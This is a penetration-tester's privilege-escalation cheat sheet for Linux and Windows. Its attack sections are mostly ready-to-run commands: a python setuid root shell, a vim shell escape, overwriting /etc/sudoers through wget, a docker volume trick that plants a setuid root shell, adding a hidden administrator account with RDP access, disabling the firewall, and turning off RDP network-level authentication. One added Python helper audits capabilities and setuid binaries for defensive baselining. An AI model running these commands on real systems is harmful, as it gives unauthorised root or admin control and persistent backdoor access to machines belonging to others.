Priv Escalation

Linux

Enumeration

Monitor running file

Taken from an ippsec video

# Poll the process list once a second and print only the lines that appeared (>) or disappeared (<)
IFS=$'\n'
old_process=$(ps -eo command)

while true; do
  new_process=$(ps -eo command)
  diff <(echo "$old_process") <(echo "$new_process") | grep '[<>]'
  sleep 1
  old_process=$new_process
done

Capabilities & Setuid

/sbin/getcap -r / 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
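An added audit helper, not part of the original notes, that turns the two enumeration commands above into a baseline check: it parses `getcap -r` output (both the older `path = cap+ep` and the newer `path cap=ep` syntax), flags file capabilities that grant root-equivalent power, and lists setuid binaries absent from an assumed per-host allowlist. The sample outputs and the baseline are constructed.

```python
import re

# Constructed sample of `getcap -r / 2>/dev/null`, mixing both libcap output syntaxes:
# libcap < 2.41:  "/path = cap_x+ep"     libcap >= 2.41:  "/path cap_x=ep"
GETCAP_OUTPUT = """\
/usr/bin/ping = cap_net_raw+ep
/usr/bin/python3.8 = cap_setuid+ep
/usr/sbin/arping cap_net_raw=ep
/opt/tools/tcpdump cap_net_admin,cap_net_raw=eip
"""

# Constructed sample of `find / -perm -u=s -type f 2>/dev/null`
SETUID_OUTPUT = """\
/usr/bin/sudo
/usr/bin/passwd
/usr/bin/su
/tmp/.cache/sh
"""

# Capabilities that let a process become root or bypass file permissions.
RISKY_CAPS = {"cap_setuid", "cap_setgid", "cap_sys_admin", "cap_dac_override",
              "cap_dac_read_search", "cap_sys_ptrace", "cap_sys_module",
              "cap_chown", "cap_fowner"}

# Assumed baseline of setuid binaries expected on this host; tune it per image.
SETUID_BASELINE = {"/usr/bin/sudo", "/usr/bin/passwd", "/usr/bin/su", "/usr/bin/mount"}

# path, then either " = " (old syntax) or whitespace (new syntax), then caps, then +ep / =ep
_CAP_LINE = re.compile(r"^(?P<path>\S+)(?:\s*=\s*|\s+)(?P<caps>[\w,]+)[+=](?P<flags>[eip]+)$")

def parse_getcap(text):
    """Return {path: set(capabilities)} from getcap output in either syntax."""
    result = {}
    for line in text.splitlines():
        m = _CAP_LINE.match(line.strip())
        if m is None:
            continue  # unrecognised line: leave for manual review rather than guess
        result[m.group("path")] = set(m.group("caps").split(","))
    return result

def risky_capabilities(text):
    """Paths whose file capabilities intersect RISKY_CAPS, with the offending caps."""
    return {p: sorted(c & RISKY_CAPS) for p, c in parse_getcap(text).items() if c & RISKY_CAPS}

def unexpected_setuid(text, baseline=SETUID_BASELINE):
    """Setuid files not in the baseline, sorted for stable reporting."""
    return sorted(p for p in text.split() if p not in baseline)

if __name__ == "__main__":
    for path, caps in risky_capabilities(GETCAP_OUTPUT).items():
        print(f"REVIEW capability: {path} has {','.join(caps)}")
    for path in unexpected_setuid(SETUID_OUTPUT):
        print(f"REVIEW setuid: {path} not in baseline")
```

Feed it real output by replacing the two constructed strings with the command results; anything it prints is a candidate for removal or for explicit inclusion in the baseline.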

Exploitation

python

./python -c 'import os; os.setuid(0); os.system("/bin/sh")'

vim

:set shell=/bin/bash
:shell

wget

$ echo "limited_account ALL=(ALL) NOPASSWD: ALL" > /tmp/sudoers
$ python -m SimpleHTTPServer 8080 &
$ wget 0.0.0.0:8080/tmp/sudoers -O /etc/sudoers
$ sudo /bin/bash

docker

echo -e "FROM debian:stretch-slim\nENV WORKDIR /stuff\nRUN mkdir -p /stuff\nVOLUME [ /stuff ]\nWORKDIR /stuff" > Dockerfile && docker build -t my-docker-image . && docker run -v $PWD:/stuff -t my-docker-image /bin/sh -c 'cp /bin/sh /stuff && chown root.root /stuff/sh && chmod a+s /stuff/sh' && ./sh -c id && ./sh

Writing code without an editor

$ echo "TheCodeInBase64==" | base64 -d > code.c

Shadow file

Generate sha512 password

# $6$ selects SHA-512 crypt; the salt may only use [a-zA-Z0-9./], which ascii_letters satisfies
python3 -c "import random,string,crypt;
randomsalt = ''.join(random.sample(string.ascii_letters,8));
print(crypt.crypt('MySecretPassword', '\$6\$%s\$' % randomsalt))"

Finding exploit

Compilation

Getting "error while loading shared libraries: requires glibc 2.5 or later dynamic linker"?

The cause of this error is that the dynamic binary you want to run (or one of its dependent shared libraries) only has a .gnu.hash section, but the ld.so on the target machine is too old to recognize .gnu.hash; it only recognizes the old-school .hash section.

This usually happens when the dynamic binary in question was built with a newer version of GCC. The solution is to recompile the code either with the -static compiler command-line option (to create a static binary) or with the following option, which emits both hash sections:

-Wl,--hash-style=both

Windows

Windows Exploit Suggester:

Get sysinfo

systeminfo > sys.info

Update and run the Exploit Suggester:

python windows-exploit-suggester.py -u
python windows-exploit-suggester.py -d <databasefile> -i <sysinfofile>

Add user and allow rdp

net user poneyUser SecretPassword /add
net localgroup Administrators poneyUser /add
net localgroup "Remote Desktop Users" poneyUser /ADD

Enable RDP


Turn firewall off

netsh firewall set opmode disable

Or


If error:

"ERROR: CredSSP: Initialize failed, do you have correct kerberos tgt initialized ?
Failed to connect, CredSSP required by server."

Add :

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0 /f